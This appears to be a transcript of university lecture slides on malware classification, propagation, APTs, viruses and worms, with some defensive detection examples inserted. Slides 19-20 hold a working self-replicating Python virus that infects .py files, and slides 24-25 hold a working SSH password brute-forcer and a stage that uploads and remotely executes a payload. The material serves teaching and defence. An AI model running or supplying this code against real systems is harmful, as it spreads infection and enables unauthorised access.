Understanding Malware: Types, Behavior, and Defense Strategies


Explore the world of malware, including its classification, propagation mechanisms, payload actions, and attack kits. Learn how malware poses threats to confidentiality, integrity, and availability of systems, and discover key defense strategies to combat malicious software effectively.

  • Malware
  • Cybersecurity
  • Threats
  • Defense
  • Propagation


Presentation Transcript


  1. Malicious Software (Malware) Chien-Chung Shen cshen@udel.edu

  2. Malware
     NIST defines malware as: "a program that is inserted into a system, usually covertly, with the intent of compromising the confidentiality, integrity, or availability of the victim's data, applications, or operating system or otherwise annoying or disrupting the victim" (NIST SP 800-83)

  3. Classification of Malware
     • Classified into two broad categories: based first on how it spreads or propagates to reach desired targets, then on the actions it performs once a target is reached
     • Also classified by:
       - those that need a host program (parasitic code such as viruses)
       - those that are independent, self-contained programs (worms, trojans, and bots)
       - malware that does not replicate (trojans and spam e-mail)
       - malware that does replicate (viruses and worms)

  4. Propagation Mechanisms
     • Infection of existing content by viruses that is subsequently spread to other systems
     • Exploit of software vulnerabilities by worms or drive-by-downloads to allow the malware to replicate. "Drive-by download" covers two cases:
       - Downloads which a person authorized but without understanding the consequences (e.g. downloads which install an unknown or counterfeit executable program, ActiveX component, or Java applet)
       - Any download that happens without a person's knowledge, often a virus, spyware, malware, or crimeware
     • Social engineering attacks that convince users to bypass security mechanisms to install Trojans or to respond to phishing attacks

  5. Payload Actions
     • Corruption of system or data files
     • Theft of service / making the system a zombie agent of attack as part of a botnet
     • Theft of information from the system / keylogging
     • Stealthing / hiding its presence on the system

  6. Attack Kits
     • Initially, the development and deployment of malware required considerable technical skill by software authors
     • The development of virus-creation toolkits in the early 1990s, and then of more general attack kits in the 2000s, greatly assisted in the development and deployment of malware
     • Toolkits are often known as crimeware; they include a variety of propagation mechanisms and payload modules that even novices can deploy
     • The variants that can be generated by attackers using these toolkits create a significant problem for those defending systems against them
     • Widely used toolkits include: Zeus, Blackhole, Sakura, Phoenix

  7. Attack Sources
     • Another significant malware development is the change from attackers being individuals, often motivated to demonstrate their technical competence to their peers, to more organized and dangerous attack sources such as:
       - Politically motivated attackers
       - Criminals
       - Organized crime
       - Organizations that sell their services to companies and nations
       - National government agencies
     • This has significantly changed the resources available and the motivation behind the rise of malware, and has led to the development of a large underground economy involving the sale of attack kits, access to compromised hosts, and stolen information

  8. Advanced Persistent Threats (APTs)
     • Well-resourced, persistent application of a wide variety of intrusion technologies and malware to selected targets (usually business or political)
     • Typically attributed to state-sponsored organizations, with some attacks also coming from criminal enterprises
     • Differ from other types of attack by their careful target selection and stealthy intrusion efforts over extended periods
     • High-profile attacks include Aurora, RSA, APT1, and Stuxnet

  9. Characteristics of APT
     • Advanced
       - Use by the attackers of a wide variety of intrusion technologies and malware, including the development of custom malware if required
       - The individual components may not necessarily be technically advanced but are carefully selected to suit the chosen target
     • Persistent
       - Determined application of the attacks over an extended period against the chosen target in order to maximize the chance of success
       - A variety of attacks may be progressively applied until the target is compromised
     • Threat
       - Threats to the selected targets as a result of the organized, capable, and well-funded attackers' intent to compromise the specifically chosen targets
       - The active involvement of people in the process greatly raises the threat level from that due to automated attack tools, and also the likelihood of successful attacks

  10. APT Attacks
     • Aim: varies from theft of intellectual property or security- and infrastructure-related data to the physical disruption of infrastructure
     • Techniques used:
       - Social engineering
       - Spear-phishing email
       - Drive-by-downloads from selected compromised websites likely to be visited by personnel in the target organization
     • Intent: to infect the target with sophisticated malware with multiple propagation mechanisms and payloads
     • Once they have gained initial access to systems in the target organization, a further range of attack tools are used to maintain and extend their access

  11. Viruses
     • Piece of software that infects programs
       - Modifies them to include a copy of the virus
       - Replicates and goes on to infect other content
       - Easily spread through network environments
     • When attached to an executable program, a virus can do anything that the program is permitted to do
       - Executes secretly when the host program is run
     • Specific to operating system and hardware
       - Takes advantage of their details and weaknesses

  12. Virus Components
     • Infection mechanism
       - Means by which a virus spreads or propagates
       - Also referred to as the infection vector
     • Payload
       - What the virus does (besides spreading)
       - May involve damage or benign but noticeable activity
     • Trigger
       - Event or condition that determines when the payload is activated or delivered
       - Sometimes known as a logic bomb

  13. Lifetime of Virus
     • Dormant phase
       - Virus is idle; will eventually be activated by some event
     • Propagation phase
       - Virus places a copy of itself into other programs or into certain system areas of the disk
       - The copy may not be identical to the propagating version; viruses often morph to evade detection
       - Each infected program will now contain a clone of the virus, which will itself enter the propagation phase
     • Triggering phase
       - Virus is activated to perform the function for which it was intended
     • Execution phase
       - The function is performed

  14. Virus Logic

     (a) A simple virus

     program V :=
     {1234567;

     procedure attach-to-program;
     begin
       repeat
         file := get-random-program;
       until first-program-line ≠ 1234567;   (* skip files that already carry the marker *)
       prepend V to file;
     end;

     procedure execute-payload;
     begin
       (* perform payload actions *)
     end;

     procedure trigger-condition;
     begin
       (* return true if trigger condition is true *)
     end;

     begin (* main action block *)
       attach-to-program;
       if trigger-condition then execute-payload;
       goto main;   (* hand control to the original host program *)
     end;
     }

     (b) A compression virus

     program CV :=
     {1234567;

     procedure attach-to-program;
     begin
       repeat
         file := get-random-program;
       until first-program-line ≠ 1234567;
       compress file;          (* t1 *)
       prepend CV to file;     (* t2 *)
     end;

     begin (* main action block *)
       attach-to-program;
       uncompress rest of this file into tempfile;   (* t3 *)
       execute tempfile;                             (* t4 *)
     end;
     }

     Figure 6.1 Example Virus Logic

  15. Viruses
     • A computer virus is a malicious piece of executable code that propagates typically by attaching itself to a host document, which will generally be an executable file
     • Typical hosts for computer viruses are:
       - Executable files (such as .exe files in Windows) that may be sent around as email attachments
       - Boot sectors of disk partitions
       - Script files for system administration (such as batch files in Windows, shell script files in Unix, etc.)
       - Documents that are allowed to contain macros (such as Word documents, Excel spreadsheets, Access database files, etc.)
     • Any operating system that allows third-party programs to run can support viruses

  16. Viruses
     • Because of the way permissions work in Unix/Linux, it is more difficult for a virus to wreak havoc on such machines. Let's say that a virus embedded itself into one of your script files. The virus code will execute only with the permissions that are assigned to you. For example, if you do not have permission to read or modify a certain system file, the virus code will, in general, be constrained by the same restriction
     • Windows also has a multi-level organization of permissions. For example, you can be an administrator with all possible privileges, or you can be just a user with more limited privileges. But it is fairly common for the owners of Windows machines to leave them running in administrator mode. That is, most owners of Windows machines will have only one account on their machine, and that will be the account with administrator privileges. This does not usually happen in Unix/Linux
     • Caveat: since Windows Vista, User Account Control runs even an administrator's programs with a filtered standard-user token by default and prompts before elevation, so a virus started from such an account does not automatically get administrator rights; it still gets everything the user's own files and settings allow

  17. Viruses
     • At the least, a virus will duplicate itself when it attaches itself to another host document, that is, to another executable file. But the important thing to note is that this copy does not have to be an exact replica of itself. In order to make detection by pattern matching more difficult, the virus may alter itself when it propagates from host to host. In most cases, the changes made to the viral code are simple, such as reordering instructions whose order does not matter. Viruses that are capable of changing themselves are called mutating viruses
     • Computer viruses need to know if a potential host is already infected, since otherwise the size of an infected file could grow without bounds through repeated infection. Viruses typically place a signature (such as a string that is an impossible date) at a specific location in the file for this purpose

  18. Viruses
     • Most commonly, the execution of a particular instance of a virus (in a specific host file) will come to an end when the host file has finished execution. However, it is possible for a more vicious virus to create a continuously running program in the background
     • To escape detection, the more sophisticated viruses encrypt themselves with keys that change with each infection. What stays constant in such viruses is the decryption routine: it has to run before anything else can be decrypted, so it cannot itself be encrypted, and it is therefore what a scanner looks for
     • The payload part of a virus is that portion of the code that is not related to propagation or concealment
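The per-infection key idea on this slide, as an added example that is not from the slides or from any real virus: a toy encrypted virus in Python. A stand-in body is XORed with a fresh random key for each copy, the decryptor stub is the only thing that survives unchanged across copies, and two scanners show why matching on bytes from the body fails while matching on the stub works. Every name in it (BODY, DECRYPTOR_STUB, make_copy, run_copy, the two *_hits scanners) is invented for the demonstration.

```python
import os

# Constructed stand-in for the virus body (propagation + payload code).
BODY = b"search(); infect(); bomb()"

# The decryptor has to run before anything else is decrypted, so it cannot be
# encrypted itself: this is the part that stays constant from copy to copy.
DECRYPTOR_STUB = b"for i in range(len(c)): c[i] ^= key[i % len(key)]"


def xor(data, key):
    """Repeating-key XOR; applying it twice with the same key restores data."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def make_copy(body=BODY, key=None):
    """Build one infected copy: the stub, then this copy's key, then the body
    encrypted under it. A fresh random key is drawn for every infection."""
    if key is None:
        key = os.urandom(8)
    ciphertext = xor(body, key)
    # hex-encode the two variable fields so the copy can be split on newlines
    return b"\n".join([DECRYPTOR_STUB, key.hex().encode(), ciphertext.hex().encode()])


def run_copy(copy):
    """What the stub does at run time: read its own key and decrypt the body."""
    stub, key_hex, ct_hex = copy.split(b"\n")
    if stub != DECRYPTOR_STUB:
        raise ValueError("not a copy produced by make_copy")
    return xor(bytes.fromhex(ct_hex.decode()), bytes.fromhex(key_hex.decode()))


def body_signature_hits(copy, signature=BODY[:9]):
    """Naive scanner: pattern-match on bytes taken from the plaintext body.
    Misses every copy, because the body is never stored in the clear."""
    return signature in copy


def stub_signature_hits(copy):
    """Scanner that matches the constant decryptor stub instead: catches every
    copy regardless of key, until the author starts mutating the stub too."""
    return DECRYPTOR_STUB in copy


if __name__ == "__main__":
    a, b = make_copy(), make_copy()
    print("two copies identical?      ", a == b)
    print("both decrypt to the body?  ", run_copy(a) == BODY == run_copy(b))
    print("body signature found?      ", body_signature_hits(a), body_signature_hits(b))
    print("stub signature found?      ", stub_signature_hits(a), stub_signature_hits(b))
```

The stub is what real scanners key on for this class of virus, which is exactly why the next step historically was to mutate the stub as well (the mutating viruses of the previous slide) and why scanners moved to emulating the decryptor rather than matching its bytes.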

  19. Virus in Python (1)
     #!/usr/bin/python
     # Cranklin's Python virus (slide version): prepends itself to every
     # uninfected .py file below the current directory, then runs its payload
     import os
     import datetime

     SIGNATURE = "CRANKLIN PYTHON VIRUS"  # marker: a file containing it is skipped

     def search(path):
         # recursively collect .py files under path that do not yet carry SIGNATURE
         filestoinfect = []
         filelist = os.listdir(path)
         for fname in filelist:
             if os.path.isdir(path + "/" + fname):
                 filestoinfect.extend(search(path + "/" + fname))  # recursive
             elif fname[-3:] == ".py":
                 infected = False
                 for line in open(path + "/" + fname):
                     if SIGNATURE in line:
                         infected = True
                         break
                 if infected == False:
                     filestoinfect.append(path + "/" + fname)
         return filestoinfect

  20. Virus in Python (2)
     def infect(filestoinfect):
         # copy the virus body (the first 49 lines of this file) in front of each target
         virus = open(os.path.abspath(__file__))  # name of myself
         virusstring = ""
         for i, line in enumerate(virus):
             if i >= 0 and i < 49:  # 49 = number of lines in the whole virus (slides 19 and 20 joined)
                 virusstring += line
         virus.close()
         for fname in filestoinfect:
             f = open(fname)
             temp = f.read()
             f.close()
             f = open(fname, "w")
             f.write(virusstring + temp)  # virus first, the host's own code after it
             f.close()

     def bomb():
         # trigger and payload: fires only on 25 January
         if datetime.datetime.now().month == 1 and datetime.datetime.now().day == 25:
             print("HAPPY BIRTHDAY CRANKLIN!")

     filestoinfect = search(os.path.abspath(""))  # absolute path of CWD
     infect(filestoinfect)
     bomb()
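Added example, not part of the slides: a scanner and disinfector for the prepender virus above. It relies on the two things the virus keeps constant in every copy: the SIGNATURE marker line it uses to avoid re-infecting a file, and the fact that the prepended body ends with the bomb() call. The sample infected file is constructed inline and shortened; the function names (is_infected, disinfect, scan_tree, clean_tree) are this example's own.

```python
import os
import tempfile

# Built from two pieces so this file itself does not contain the marker: the
# virus skips any file that contains it, and the scanner must not flag itself.
MARKER = "CRANKLIN PYTHON" + " VIRUS"
BODY_END = "bomb()"  # the last line of the prepended body (the payload call)

# Constructed sample: a shortened virus body prepended to a three-line host,
# laid out the way infect() writes it (virus first, host code after it).
VIRUS_BODY = (
    "#!/usr/bin/python\n"
    "import os\n"
    'SIGNATURE = "' + MARKER + '"\n'
    "def bomb():\n"
    "    pass\n"
    "bomb()\n"
)
HOST = 'import sys\nprint("hello from the host")\nsys.exit(0)\n'
INFECTED = VIRUS_BODY + HOST


def is_infected(text):
    """Same test the virus itself uses to decide a file is already infected."""
    return any(MARKER in line for line in text.splitlines())


def disinfect(text):
    """Strip the prepended body and return the host; clean input comes back as is."""
    if not is_infected(text):
        return text
    lines = text.splitlines(keepends=True)
    for i, line in enumerate(lines):
        if line.rstrip("\r\n") == BODY_END:
            return "".join(lines[i + 1:])
    # marker present but the body does not end where expected: a variant we do
    # not understand, so refuse rather than cut the host in the wrong place
    raise ValueError("marker found but end of virus body not found")


def scan_tree(root):
    """Walk root the way search() does and report the infected .py files."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if fname.endswith(".py"):
                path = os.path.join(dirpath, fname)
                with open(path, encoding="utf-8", errors="replace") as f:
                    if is_infected(f.read()):
                        hits.append(path)
    return sorted(hits)


def clean_tree(root):
    """Disinfect every hit in place; returns the paths that were restored."""
    restored = []
    for path in scan_tree(root):
        with open(path, encoding="utf-8", errors="replace") as f:
            text = f.read()
        with open(path, "w", encoding="utf-8") as f:
            f.write(disinfect(text))
        restored.append(path)
    return restored


if __name__ == "__main__":
    # demo in a throwaway directory: one infected file, one clean file
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "victim.py"), "w") as f:
            f.write(INFECTED)
        with open(os.path.join(tmp, "clean.py"), "w") as f:
            f.write(HOST)
        print("infected:", scan_tree(tmp))
        print("restored:", clean_tree(tmp))
        print("after cleaning:", scan_tree(tmp))
```

Two things follow from how the check works. Because the virus skips any file that already contains the marker, planting the marker line in a script inoculates it against this particular virus. And because both the marker and the body layout are fixed, a mutating variant that renamed SIGNATURE or moved bomb() would defeat this scanner outright, which is the point of slide 17.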

  21. Worms
     • The main difference between a virus and a worm is that a worm does not need a host document, i.e., a worm does not need to attach itself to another program. In that sense, a worm is self-contained and autonomous
     • On its own (being autonomous), a worm is able to send copies of itself to other machines over a network
     • Therefore, whereas a worm can harm the network and consume network bandwidth, the damage caused by a virus is mostly local to the machine
     • Note that a lot of people use the terms virus and worm synonymously. That is particularly the case with vendors of anti-virus software. A commercial anti-virus program is supposed to catch both viruses and worms

  22. Mechanisms of Worms
     • Since, by definition, a worm is supposed to hop from machine to machine on its own, it needs to come equipped with considerable networking support
     • With regard to autonomous network hopping, worms may hop from one machine to another by a variety of means:
       - By using remote shell facilities, as provided by, say, ssh, rsh, rexec, etc., in Unix, to execute a command on the remote machine. If the target machine can be compromised in this manner, the intruder could install a small bootstrap program on the target machine that could bring in the rest of the malicious software
       - By cracking passwords and logging in as a regular user on a remote machine. Password crackers take advantage of people's tendency to keep their passwords as simple as possible
       - By using buffer overflow vulnerabilities in networking software. In networking with sockets, communication is initiated by a client socket sending a request for connection to a server socket that is constantly listening for such requests. If the server socket code is vulnerable to buffer overflow or other stack corruption, an attacker could manipulate that into the execution of certain system functions on the server machine that would allow the attacker's code to be downloaded onto the server machine

  23. Damages by Worms
     • In all cases, the extent of harm that a worm can carry out depends on the privileges accorded to the guise under which the worm programs are executing. So if a worm manages to guess someone's password on a remote machine (and that someone does not have superuser privileges), the extent of harm done might be minimal
     • Nevertheless, even when no local harm is done, a propagating worm can bog down a network and, if the propagation is fast enough, can cause a shutdown of the machines on the network. This can happen particularly when the worm is not smart enough to keep a machine from getting reinfected repeatedly and simultaneously (machines can only support a certain maximum number of processes running simultaneously)
     • Thus, even "harmless" worms can cause a lot of harm by bringing a network to its knees

  24. Worm in Python
     # SSHDictionaryAttack.py: the worm's first stage, guessing SSH credentials
     # from a file of "username password" pairs, one pair per line
     import paramiko
     import sys

     def AttackSSH(ipAddress, dictionaryFile):
         print("[+] Attacking Host : %s " % ipAddress)
         ssh = paramiko.SSHClient()
         ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())  # accept any host key
         for line in open(dictionaryFile, "r").readlines():
             [username, password] = line.strip().split()
             try:
                 print("[+] Trying to break in with username: %s password: %s " % (username, password))
                 ssh.connect(ipAddress, username=username, password=password)
             except paramiko.AuthenticationException:
                 print("[-] Failed! ...")
                 continue
             print("[+] Success ... username: %s and password %s is VALID! " % (username, password))
             ssh.close()
             break

     if __name__ == "__main__":
         AttackSSH(sys.argv[1], sys.argv[2])

     $ py SSHDictionaryAttack.py 192.168.1.5 dictionary

  25. Worm in Python
     # UploadAndExecute.py: the second stage, run with the credentials found on
     # the previous slide; copies the payload to the victim over SFTP and starts it
     import paramiko
     import sys

     def UploadFileAndExecute(sshConnection, fileName):
         sftpClient = sshConnection.open_sftp()
         sftpClient.put(fileName, "/tmp/" + fileName)
         # one command, so chmod has finished before the payload is started;
         # nohup + & detach it so it outlives the SSH session
         sshConnection.exec_command("chmod a+x /tmp/" + fileName + " && nohup /tmp/" + fileName + " &")

     if __name__ == "__main__":
         ssh = paramiko.SSHClient()
         ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
         ssh.connect(sys.argv[1], username=sys.argv[2], password=sys.argv[3])
         UploadFileAndExecute(ssh, sys.argv[4])
         ssh.close()

     #!/usr/bin/env python3
     # Payload.py: what runs on the victim (needs the shebang above, since it is
     # executed directly); here it only leaves a marker directory
     import os
     os.mkdir("/tmp/hacked")

     $ py UploadAndExecute.py 192.168.1.5 cshen 1234vm Payload.py
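Added example, not from the slides, for the defender's side of the dictionary attack on slides 24 and 25: detection logic run over constructed sshd log lines in OpenSSH's auth.log message format. The threshold of five failures from one source, the host names and the addresses are assumptions made for the demonstration; the regular expressions match the real "Failed password for ..." and "Accepted password for ..." messages that sshd writes.

```python
import re
from collections import defaultdict

# sshd's auth.log messages; "invalid user" appears when the account does not exist
FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")
ACCEPTED = re.compile(r"Accepted password for (\S+) from (\S+) port \d+")

# Constructed sample: the worm walks its dictionary against one host and then
# gets in as cshen; an unrelated admin session from another address is mixed in.
SAMPLE_LOG = """\
Jan 25 10:00:01 host sshd[1201]: Failed password for invalid user admin from 192.168.1.77 port 50212 ssh2
Jan 25 10:00:02 host sshd[1203]: Failed password for root from 192.168.1.77 port 50213 ssh2
Jan 25 10:00:02 host sshd[1205]: Failed password for cshen from 192.168.1.77 port 50214 ssh2
Jan 25 10:00:03 host sshd[1207]: Failed password for cshen from 192.168.1.77 port 50215 ssh2
Jan 25 10:00:03 host sshd[1209]: Failed password for invalid user test from 192.168.1.77 port 50216 ssh2
Jan 25 10:00:04 host sshd[1211]: Accepted password for cshen from 192.168.1.77 port 50217 ssh2
Jan 25 10:05:00 host sshd[1300]: Accepted publickey for alice from 10.0.0.5 port 41022 ssh2
Jan 25 10:06:00 host sshd[1310]: Failed password for alice from 10.0.0.5 port 41023 ssh2
"""


def analyze(log_text, threshold=5):
    """Per source address: count password failures, the distinct usernames tried,
    and whether a password login was accepted after the failures (the worm's
    success). Returns one alert per address at or above threshold."""
    stats = defaultdict(lambda: {"failed": 0, "users": set(), "success_after": None})
    for line in log_text.splitlines():
        m = FAILED.search(line)
        if m:
            user, ip = m.groups()
            stats[ip]["failed"] += 1
            stats[ip]["users"].add(user)
            continue
        m = ACCEPTED.search(line)
        if m:
            user, ip = m.groups()
            # a success is only interesting once the source has already been guessing
            if stats[ip]["failed"] >= threshold:
                stats[ip]["success_after"] = user
    alerts = []
    for ip, s in stats.items():
        if s["failed"] >= threshold:
            alerts.append({
                "ip": ip,
                "failed": s["failed"],
                "users": sorted(s["users"]),
                "compromised_user": s["success_after"],  # None if the guessing never succeeded
            })
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

The distinct-user list is the useful discriminator in practice: a person who mistypes a password produces failures for one account, whereas the dictionary attack above walks through admin, root, and whatever else the wordlist holds. An alert whose compromised_user is set is the case that matters most, because the next thing the worm does is the upload-and-execute step on slide 25.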
